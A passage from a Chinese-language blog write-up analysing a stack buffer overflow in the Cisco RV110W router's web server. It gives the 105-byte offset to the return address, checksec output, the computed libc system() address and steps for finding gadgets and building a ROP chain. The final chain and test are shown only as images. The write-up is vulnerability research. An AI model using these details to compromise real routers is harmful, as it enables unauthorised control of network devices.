<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119172907415.png" alt="image-20211119172907415"></p>
<p>如果是构造 构造105*‘A’+DDDD 的话，执行到strlen处，获取到正确有效的地址。<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119173608437.png" alt="image-20211119173608437"></p>
<p>最终可以劫持PC<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119173834064.png" alt="image-20211119173834064"></p>
<h3 id="2）-计算偏移量"><a href="#2）-计算偏移量" class="headerlink" title="2） 计算偏移量"></a>2） 计算偏移量</h3><p>经过上面的劫持PC, valid_user()函数中局部变量acStack109 到$ra的偏移量是105，因此只需要填充105个字节就可以到达$ra返回地址</p>
<h3 id="3）确定漏洞利用途径"><a href="#3）确定漏洞利用途径" class="headerlink" title="3）确定漏洞利用途径"></a>3）确定漏洞利用途径</h3><p>由于mips 架构的程序无法开启NX防护，因此接下来只需要寻找可用的gadgets.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">shayuhuajiao@ubuntu ~/i/g/_/s/u/sbin&gt; checksec httpd </span><br><span class="line">[*] Checking for new versions of pwntools</span><br><span class="line">[*] &#x27;/home/shayuhuajiao/_RV110W_FW_1.2.1.7.bin.extracted/squashfs-root/usr/sbin/httpd&#x27;</span><br><span class="line">    Arch:     mips-32-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br><span class="line">    RWX:      Has RWX segments</span><br></pre></td></tr></table></figure>



<p>首先使用vmmap 查看程序运行时加载的lib 库的情况和执行权限。这里我们可以确定&#x2F;lib&#x2F;libc.so.0是可以使用的。</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210730101633714.png" alt="image-20210730101633714"></p>
<p>使用 mipscrop.stackfinder() 找到合适的 gadget。</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210809144156630.png" alt="image-20210809144156630"></p>
<p>寻找可以利用的system 函数和该函数的对Libc 中的偏移地址，然后根据libc 的基地址，就可以获取system的完整地址为 0x2af98000 + 0x0004C7E0 &#x3D; 0x2AFE47E0</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20210730102407081.png" alt="image-20210730102407081"></p>
<p>找到可以使用的nop 地址<img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211124155554186.png" alt="image-20211124155554186"></p>
<h3 id="4）-构造最终的ROP-Chain"><a href="#4）-构造最终的ROP-Chain" class="headerlink" title="4） 构造最终的ROP Chain"></a>4） 构造最终的ROP Chain</h3><p>最终构造的ROP chain 如下图所示</p>
<p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211124162224979.png" alt="image-20211124162224979"></p>
<h3 id="5-exploit-测试"><a href="#5-exploit-测试" class="headerlink" title="5)  exploit 测试"></a>5)  exploit 测试</h3><p><img src="/Cisco_RV110W_%E5%A0%86%E6%A0%88%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.assets/image-20211119181424341.png" alt="image-20211119181424341"></p>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p><h4>Copyright © 2023 | Author: HigerHu | </a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
